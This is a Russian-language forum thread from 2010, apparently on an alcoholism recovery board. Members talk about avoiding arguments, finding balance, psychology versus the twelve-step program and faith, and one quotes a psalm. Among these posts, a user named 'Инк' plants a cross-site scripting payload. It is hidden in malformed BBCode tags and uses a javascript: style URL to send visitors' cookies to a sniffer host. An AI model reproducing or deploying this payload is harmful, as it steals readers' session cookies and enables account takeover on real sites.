Кстати, в последнее время я ловлю себя на мысли, что необходимость доказывать кому-то свою правоту уходит. Но вот наблюдать как это делают другие при мне очень сложно. Хочется вмешаться и начать гурить (от слова гуру), типа что же вы делаете, опомнитесь:)))) не могу принимать чужие склоки или споры. сама, видимо, грешна в этом сильно)))

Спустя 1 час, 13 минут, 52 секунды (22.09.2010 - 23:54) Rearranger написал(а):
Болезнь неприятия социума, ребенку не объяснили, что всё это не совсем чтобы серьезно - вот он бедолага и вовлекся в игру, считая ее единственно верной и существующей - а моск не выдержал пинка....

Спустя 2 минуты, 42 секунды (22.09.2010 - 23:56) velosipedistka написал(а):
Цитата (Rearranger @ 22.09.2010 - 23:54 )
Болезнь неприятия социума, ребенку не объяснили, что всё это не совсем чтобы серьезно - вот он бедолага и вовлекся в игру, считая ее единственно верной и существующей - а моск не выдержал пинка....

в чем именно болезнь? в смысле не поняла к чему комментарий. к какой фразе. к моей, когда я не выдерживаю склок? или к самим склокам? или к чему?

Спустя 5 минут (23.09.2010 - 00:01) pechora написал(а):
Цитата (velosipedistka @ 22.09.2010 - 23:56 )
или к чему?

Это шутки у него такие.. Вглядись в его лицо повнимательней.. biggrin.gif

Спустя 7 минут, 4 секунды (23.09.2010 - 00:09) Rearranger написал(а):
pechora
да уж..... шутки - обхохочешься просто



Спустя 5 минут, 21 секунду Rearranger написал(а):
velosipedistka
ну как тебе объяснить, человека заставляли с детства адаптироваться к социуму, который в принципе болен, нет нормальных социумов, в том плане, чтоб они тем или иным образом не извращали человеческую природу - кто-то выдюжил, малехо больше сил имел, кто-то нет и забухал, чтоб компенсировать радость от коллективного договора с соплеменниками.....
а учитывая еще и то что сами "учителя" воспитывались там же в том же социуме - то мама-не горюй....

Спустя 5 минут, 31 секунду (23.09.2010 - 00:14) velosipedistka написал(а):
Rearranger
Теперь поняла. Еще как)
Чем ты в жизни занимаешься, если не секрет? Я о профессии. Скорее всего отшутишься и не ответишь, но вдруг)

Спустя 2 минуты, 5 секунд (23.09.2010 - 00:16) Rearranger написал(а):
velosipedistka
сажатель морквы cool.gif laugh.gif разумеется, а остальные думают что дизайнер

Спустя 1 минуту, 29 секунд (23.09.2010 - 00:18) velosipedistka написал(а):
Пасиба) Че-то такое и думала - либо журналюга, либо дизайнер.

Спустя 1 минуту, 37 секунд (23.09.2010 - 00:19) Rearranger написал(а):
velosipedistka
ну вот и ты вовлеклась - sad.gif
я моркву сажаю, а дизайнер - прикрытие для налоговой и психиатров

Спустя 1 минуту, 42 секунды (23.09.2010 - 00:21) velosipedistka написал(а):
Rearranger
Я почти психиатр, так что все как надо:)

Спустя 9 часов, 27 минут, 21 секунду (23.09.2010 - 09:48) pechora написал(а):
Цитата (velosipedistka @ 23.09.2010 - 00:21 )
Я почти психиатр, так что все как надо:)

Ужс! А я с тобой так мило беседовал.. rolleyes.gif

Спустя 1 час, 9 минут, 41 секунду (23.09.2010 - 10:58) Валерий.С написал(а):
Цитата (velosipedistka @ 23.09.2010 - 00:21 )
Я почти психиатр, так что все как надо:)

Да не,выздоравливающий психиатр,как сантехник выздоравливающий это вполне приемлемо.
Вот неалкоголиковых психиатров....хотя одного знаю,горой за нас стоит,в других сомневаюсь. biggrin.gif



Спустя 21 минуту, 54 секунды Валерий.С написал(а):
Цитата (Rearranger @ 21.09.2010 - 23:33 )
всё остальное wink.gif сказал ТЫ, - и это именно тот взгляд которым ТЫ смотришь на мир и оцениваешь его

Это как раз твой взгляд на мир,который ты оцениваешь,я сослался на конкретный источник,
откуда черпаю то,что реально помогает.В этой теме дана задача....потом ответы были,всё
хорошо в принципе,но это как не зная геометрии,взять и списать ответ.Без знания решения
никогда не будешь знать самого предмета.Тоже и здесь,скажи мне,что не надо пить первую
рюмку-ответ правильный,замечательно,браво!А как её не пить???Тут мне годами будут рассказывать
само решение.Извини,но я сделал правильно,дал конкретный источник,а не как ты пишешь,
свою позицию оценки мира.Хотя в этом ты прав я считаю свою позицию правильной и меня в
этом не смутят,потому что мне реально помогает.Тебе помогает другая позиция,ему третья,но...
каждый доносит своё,человек слушающий выбирает сам! biggrin.gif

Спустя 1 час, 50 минут, 40 секунд (23.09.2010 - 12:49) Rearranger написал(а):
Валерий.С
дык на здоровье, всё делаешь правильно, молодец.

Спустя 4 минуты, 34 секунды (23.09.2010 - 12:53) Валерий.С написал(а):
Цитата (Rearranger @ 23.09.2010 - 12:49 )
молодец.

Успел исправить,ну я понял тебя,всё верно)))

Спустя 2 минуты, 32 секунды (23.09.2010 - 12:56) Morsla написал(а):
Вспомнила себя когла пришла сюда. Спецом была во всех областях.. чем дальше в лес толще партизаны... мешало мне это пришлось все что знаю выкинуть ибо не работало.. казалось только biggrin.gif

Спустя 7 часов, 59 минут, 3 секунды (23.09.2010 - 20:55) velosipedistka написал(а):
Цитата (Ручеек @ 23.09.2010 - 11:29 )
Почти психиатр? Это как? Как почти беременная? laugh.gif

клинический психолог



Спустя 4 минуты, 21 секунду velosipedistka написал(а):
Цитата (Morsla @ 23.09.2010 - 12:56 )
Вспомнила себя когла пришла сюда. Спецом была во всех областях.. чем дальше в лес толще партизаны... мешало мне это пришлось все что знаю выкинуть ибо не работало.. казалось только biggrin.gif

Если вдруг это мне, то я прям спецом себя во всех областях не считаю))) В одной разве что только - в профессиональной. Но она мало имеет отношения к тому, что здесь. Сюда я пришла с полным доверием, потому что привели стОящие люди. Я скорее впитываю пока.

Спустя 1 час, 18 минут, 19 секунд (23.09.2010 - 22:13) velosipedistka написал(а):
Цитата (Ручеек @ 23.09.2010 - 21:56 )
клинический психолог [/QUOTE]
А. А я думал паталогоанатомический. laugh.gif

Как бы сам ответил на свой комментарий?smile.gif - "Долго думал"?

Спустя 56 минут, 39 секунд (23.09.2010 - 23:10) рыжий лекарь написал(а):
Цитата
Как найти золотую середину?.

Если выпил от души - все девчата хороши!
Если выпил мало, скупо - все вокруг убого, глупо.
Золотая середина
Ты, увы, недостижима...

Спустя 1 час, 11 минут, 24 секунды (24.09.2010 - 00:21) Morsla написал(а):
Цитата
Цитата (Morsla @ 23.09.2010 - 12:56 )
Вспомнила себя когла пришла сюда. Спецом была во всех областях.. чем дальше в лес толще партизаны... мешало мне это пришлось все что знаю выкинуть ибо не работало.. казалось только 

Если вдруг это мне, то я прям спецом себя во всех областях не считаю))) В одной разве что только - в профессиональной. Но она мало имеет отношения к тому, что здесь. Сюда я пришла с полным доверием, потому что привели стОящие люди. Я скорее впитываю пока.

Да нет не тебе, просто про себя вспомнила и хихикнула тоже про себя... то что дает программа это сильно отличается от того как мы снаружи даже с мед и псих образованием привыкли думать... мне пришлось все оставить за дверью... голой войти совсем... у меня даже мечта МППГУ отпала навсегда. за ненадобностью ... вот настолько мощно что все остальное становиться ненужно. Хотя на образование еще освоить и это - цены не будет как спецу.... кругозор будет 360 С...

Спустя 3 минуты, 4 секунды (24.09.2010 - 00:24) pechora написал(а):
Цитата (Morsla @ 24.09.2010 - 00:21 )
голой войти совсем...

Как Анжелина во Вредительском сериале.. (мечтательно прикрывает глаза) rolleyes.gif

Спустя 5 минут, 39 секунд (24.09.2010 - 00:30) Morsla написал(а):
pechora
А не обольшайси... старенькая я уже...

Спустя 3 минуты, 40 секунд (24.09.2010 - 00:34) pechora написал(а):
Цитата (Morsla @ 24.09.2010 - 00:30 )
А не обольшайси... старенькая я уже...

В моих мечтах?? В них ты не постареешь! Не обольщайси!... rolleyes.gif

Спустя 2 минуты, 51 секунду (24.09.2010 - 00:36) velosipedistka написал(а):
Цитата (Morsla @ 24.09.2010 - 00:21 )
Да нет не тебе, просто про себя вспомнила и хихикнула тоже про себя... то что дает программа это сильно отличается от того как мы снаружи даже с мед и псих образованием привыкли думать... мне пришлось все оставить за дверью... голой войти совсем... у меня даже мечта МППГУ отпала навсегда. за ненадобностью ... вот настолько мощно что все остальное становиться ненужно. Хотя на образование еще освоить и это - цены не будет как спецу.... кругозор будет 360 С...

Да, мне тоже много чего пришлось поскидывать, чтобы смочь "войти". Но кое-что (и профессиональное) уже в программе приобреталось, паралелльно. Мне со спонсором повезло очень в этом смысле - много всяких совпадений.

Спустя 15 минут, 44 секунды (24.09.2010 - 00:52) velosipedistka написал(а):
Цитата (Ручеек @ 24.09.2010 - 00:43 )
Вот, например, Тина Тернер. Знаешь сколько ей лет? Я бы не против с ней. Только она - не согласиться.

И Катрин Денев. Тут даже я не против:))))) Только она тоже вряд ли согласится, ага

Спустя 9 минут, 18 секунд (24.09.2010 - 01:01) Morsla написал(а):
velosipedistka
Скорее всего обесцениться большая часть приобретенных знаний. Ведь психология это попытка поправить свое душвное здоровье и обрести здравомыслие и установить отношение с миром и к миру без ВС. У людей не очень так сказать не смертельно больных он помогает взрослеть..решать некотрые проблемы. Но у нас нет...
От меня почти уже всё отвалилось... даже интерес потеряла хотя горела интересом сильно... большая база.

Спустя 11 минут, 15 секунд (24.09.2010 - 01:13) Morsla написал(а):
Ручеек
Можно ... я буду рада. Кинь мне в журнал в комменты... Хорошо? Флудить не по теме вон на меня уже и так симпатии возросли ... залюбят а то biggrin.gif biggrin.gif biggrin.gif
возврашаясь к теме
Золотая серединна часах 00 12 я собиралась спать в 22 00 а по факту все последнии дни засапала в 02 00 ... значит самое время и себе хорошо сделать и В тему попасть... Воть.
Печера я пошутила... серьезно меня не воспринимай у меня приступы неумелого остроумия после Бомжа со сценарием...

Спустя 7 часов, 35 минут, 30 секунд (24.09.2010 - 08:48) velosipedistka написал(а):
Цитата (Morsla @ 24.09.2010 - 01:01 )
velosipedistka
Скорее всего обесцениться большая часть приобретенных знаний. Ведь психология это попытка поправить свое душвное здоровье и обрести здравомыслие и установить отношение с миром и к миру без ВС. У людей не очень так сказать не смертельно больных он помогает взрослеть..решать некотрые проблемы. Но у нас нет...
От меня почти уже всё отвалилось... даже интерес потеряла хотя горела интересом сильно... большая база.

Будем ли мы считать, что медик приходит в медицину в попытке обрести физическое здоровье? Будем ли мы считать, что медицина отрицает ВС? Вряд ли. Психолог - такая же работа как куча других. Есть много непрофессионалов, есть люди, которые профессионалы от Бога. Противоречия ВС и например, какой-нибудь работы с горем или утратой в психотерапии я не вижу. Может, мне повезло с окружением. Определенная часть профи вокруг меня - выздоравливающие с пятнадцати-двадцатилетним стажем трезвости, либо верующие люди. Так что не стоит у меня так вопрос совсем. От человека зависит, а не от профессии, что и как он несет в мир и в себе.



Спустя 8 минут, 43 секунды velosipedistka написал(а):
Morsla
Друзья и знакомые мои работали с аутистами, с детьми из Беслана, с пережившими терракты и тд. Где тут противоречение ВС?...
Либо ты про посыл, зачем человек идет в эту работу. Так вот если исходя из того, чтобы только со своими тараканами разобраться, не так уж часто, он потом практикуется. И именно что - отваливается все со временем.

Спустя 2 часа, 7 минут, 3 секунды (24.09.2010 - 10:55) Morsla написал(а):
velosipedistka
Я не спорю и не умалаю ни чьих заслуг и добра... Боже упаси. Просто Программа это совсем другое.
Я говорю о себе только... о преображении багажа. О наполнении новым смыслом и приобретении новых оттенков и чистки ненужного...

Спустя 33 минуты, 57 секунд (24.09.2010 - 11:29) Валерий.С написал(а):
Удивительно высказывания тех,кто не находил и не ищет эту серединку,настаивая что её нет,
кто не ищет тот и не находит,чего вы вообще тогда тут делаете?Пытаетесь переубедить своим
бездействием и отрицанием?Если вы не находите выход,вы в нём стоите! biggrin.gif

Спустя 10 часов, 20 минут, 25 секунд (24.09.2010 - 21:50) velosipedistka написал(а):
Цитата (Morsla @ 24.09.2010 - 10:55 )
velosipedistka
Я не спорю и не умалаю ни чьих заслуг и добра... Боже упаси. Просто Программа это совсем другое.
Я говорю о себе только... о преображении багажа. О наполнении новым смыслом и приобретении новых оттенков и чистки ненужного...

Конечно, программа - другое. Они вообще для меня про разное. Мне непонятно просто это противопоставление. Не все люди зависимые на белом свете, но есть среди и независимых такие, которым нужна помощь. В том, что в психологи идти, чтобы от зависимости вылечиться - полная чушь, я согласна. Уверенна даже.
В общем психотерапия - это моя работа. К программе не относящаяся. Так же как вон дизайнеры тут есть, как оказалось. И сажатели морквы, ага:)))

Спустя 40 минут, 46 секунд (24.09.2010 - 22:30) Rearranger написал(а):
Валерий.С
а кто настаивал что ее нет???? user posted image кто именно тебя пытается переубедить? Судя по пассажу про выход - наверное те кто нашли? Или кто? Ну реально интересно - прочел, не нашел логики - заинтересовался тем, что же имелось ввиду.
Аффтар, отзовись, а то я волнуюсь!!!!!

Середина есть - но достигает ее каджый САМ в меру своих возможностей и опыта, опыт невозможно передать, его можно рассказать - но не передать, посему - те кто дают советы - могут убить себя об стену, их советы хороши для них самих. Каждому придется учиться находить эту самую середину - САМОСТОЯТЕЛЬНО. (разжеванно для особо одаренных) Можешь попробовать воспользоваться советами по обретению 3C от дяди Васи, поможет, только если сам станешь дядьВасей.....

Спустя 34 минуты, 9 секунд (24.09.2010 - 23:04) Валерий.С написал(а):
Прикол,самоликвидация!А,точно ,велосипедистка чё тута пишет?
Цитата (Rearranger @ 24.09.2010 - 22:30 )
а кто настаивал что ее нет????

Да,кстати,хто эта настаивает,не надо мне настоек,эт вредна.
Поздравляю,считай что я погорячился,потому что всю тему не просмотрел перед тем,как писать.
Признаю своё бессилие,не волновайся,всё харашо!!!Тот кто в исток нагадить мог или поток.
biggrin.gif

Спустя 38 минут, 14 секунд (24.09.2010 - 23:43) velosipedistka написал(а):
Цитата (Валерий.С @ 24.09.2010 - 23:04 )
Прикол,самоликвидация!А,точно ,велосипедистка чё тута пишет?
Цитата (Rearranger @ 24.09.2010 - 22:30 )
а кто настаивал что ее нет????

Да,кстати,хто эта настаивает,не надо мне настоек,эт вредна.
Поздравляю,считай что я погорячился,потому что всю тему не просмотрел перед тем,как писать.
Признаю своё бессилие,не волновайся,всё харашо!!!Тот кто в исток нагадить мог или поток.
biggrin.gif

Совсем уже ничего не понимаю. Валерий, мне так кажется, что у нас с тобой, помимо алкоголизма, еще одна общая болезнь. Мы свое что-то прочитываем в чужих словах))) И расстраиваемся, и спорим.
Мне важно то, что ты написал в этой темке. И отдельное тебе спасибо за это! А серединка, она же отсутствие качелей - да, у каждого своя.

Спустя 11 минут, 55 секунд (24.09.2010 - 23:55) Валерий.С написал(а):
Цитата (velosipedistka @ 24.09.2010 - 23:43 )
еще одна общая болезнь. Мы свое что-то прочитываем в чужих словах))) И расстраиваемся, и спорим.

Да всё хорошо)))это просто разгрузка атмосферы,пора выпустить пар пришла.С тобой я ни в чём не спорю и ни с кем не хочу спорить,а бывает что авторы удаляют или исправляют сообщения,это
нормально,помнить что мы больные,хоть и выздоравливающие! biggrin.gif

Спустя 15 минут, 17 секунд (25.09.2010 - 00:10) velosipedistka написал(а):
Валерий.С
Да я поняла, что ты не со мной:) Надо помнить, что больные, точно:) Скажи, пожалуйста, а слова молитвы, написанные у тебя в сообщениях - это твоя переформулировка или где-то нашел? Кроме первой и последней строчки, остальные какие-то очень актуальные для меня сейчас.

Спустя 8 минут, 23 секунды (25.09.2010 - 00:18) velosipedistka написал(а):
Слейд
Привет! Не очень понятно, кого слушаешь или чего? А так, рада тебе очень)

Спустя 23 часа, 42 минуты, 26 секунд (26.09.2010 - 00:01) Rearranger написал(а):
а бывает что авторы удаляют или исправляют сообщения,это
нормально
разумеется нормально, есть же кнопка "исправить".....
кнопка "удалить" тоже есть.... и потом я не идеален - могу и передумать wink.gif

Спустя 59 минут, 45 секунд (26.09.2010 - 01:00) Инк написал(а):
SQL
[email=wj@wj.com">wj@wj<a href="http://www.wj.com`=`" target="_blank">">[/email].com ` style=`background:url(java script:document.images[1].src="http://vah_snifer.com/s.gif?"+document.cookie);` [HTML][color=white][EMAIL=[URL=http://wj`=`]'><a href='http://wj`=`' target='_blank'>[/EMAIL][/URL][/color]` style=`background:url(jаvаscript:document.image s[1].src="http://vah_snifer.com/s.gif?"+document.cookie);`

Спустя 35 минут (26.09.2010 - 01:35) Morsla написал(а):
Отрекись от зла,и сотвори добро. строчка из Псалма Давида 33 го - один из моих любимых
Свернутый текст
Благословлю Господа на всякое время, выну хвала Его во устехъ моихъ: о Господе похвалится душа: да услышатъ кротцыи, и возвеселятся. Возвеличите Господа со мною, и вознесемъ имя Его вкупе. Взысках Господа, и услыша мя, и отъ всехъ скорбей моихъ избави мя. Приступите къ Нему и просветитеся, и лица ваша не постыдятся. Сей нищий воззва, и Господь услыша и, и от всехъ скорбей его спасе и. Ополчится ангелъ Господень окрестъ боящихся Его и избавитъ ихъ. Вкусите и видите, яко благ Господь: блаженъ мужъ, иже уповаетъ нань. Бойтеся Господа, вси святии Его: яко несть лишения боящимся Его. Богатии обнищаша и взалкаша взыскающии же Господа не лишатся всякаго блага. Приидите, чада, послушайте мене, страху Господню научу васъ. Кто есть человекъ хотяй животъ, любяй дни видети благи? Удержи языкъ твой от зла, и устне твои еже не глаголати льсти. Уклонися от зла и сотвори благо: взыши мира и пожени и.Очи Господни на праведныя, и уши Его въ молитву ихъ: лице же Господне на творящыя злая, еже потребити от земли память ихъ.Воззваша праведнии, и Господь услыша ихъ, и от всехъ скорбей избави ихъ. Близъ Господь сокрушенныхъ сердцемъ и смиренныя духомъ спасетъ. Многи скорби праведнымъ, и от всехъ ихъ избавитъ я Господь. Хранитъ Господь вся кости ихъ, ни едина от нихъ сокрушится. Смерть грешниковъ люта, и ненавидящии праведнаго прегрешатъ. Избавитъ Господь души рабъ Своихъ, и не прегрешатъ вси уповающии на Него.

Спустя 2 часа, 37 минут, 21 секунду (26.09.2010 - 04:13) Урсула написал(а):
Я тоже переживаю это постоянно. Как только всё идет налад, сама же причём, не дожидаясь плохого зарание всё испорчу( ЯСНО ЧЕМ), а потом скорблю . user posted image
Наверно надо не програмировать плохое, а наоборот. Ведь с другой стороны, если это относится к работе, ну что может случиться? Ну уволят, ну и что. Надо выработать какую нибудь методику против этих страхов. user posted image

Спустя 3 минуты, 46 секунд (26.09.2010 - 04:17) Honduras написал(а):
Урсула
Привет! Этому учит программа 12 шагов. Приобретай литературу ААшную и вперёд.

Спустя 5 часов, 49 минут, 20 секунд (26.09.2010 - 10:06) Rearranger написал(а):
Урсула
этому не только программа 12 шагов учит, этому много кто учит и программа не первооткрыватель этих вещей wink.gif wink.gif wink.gif , уволят.... да и хрен с ним, другую работу найдешь, только так и надо относиться к работе, да и ко многим вещам в социуме biggrin.gif

Спустя 23 минуты, 3 секунды (26.09.2010 - 10:29) Валерий.С написал(а):
Цитата (Morsla @ 26.09.2010 - 01:35 )
Отрекись от зла,и сотвори добро. строчка из Псалма Давида 33 го

Всё верно,я не делаю тайны из того,что верую во Христа,эта вера придаёт цвет и многогранность
моей жизни,а молитву тоже взял у знакомой,хотя ей(молитве) тоже немало лет и конечно потому
что она актуальна для меня,молитва-это не чья то собственность,так и идёт из уста в уста.
Не зря говорят,не можете молиться,молитесь понарошку,придёт понимание и вера и действие
и само чудо.Хуже,когда не стараюсь понять,тупо отрицая что нет того,что я не понимаю.Вместо
того,чтобы потрудиться в этом,от моих исключений из жизни своей(скажем веры или Бога),
проблема так и останется неразрешённой и легче от этого не станет никогда,даже при жизни(с отрицанием),нафиг такая плюшевая защита,только до хорошего порыва ветра,а тем более зная,
что смерти нет и тогда кто не с Богом,тот был против.Разве вера исключает логики,нет,логика
может исключать веру(эгоцентризмом). biggrin.gif


_____________
Боящийся несовершенен в любви (с) Иоанн Богослов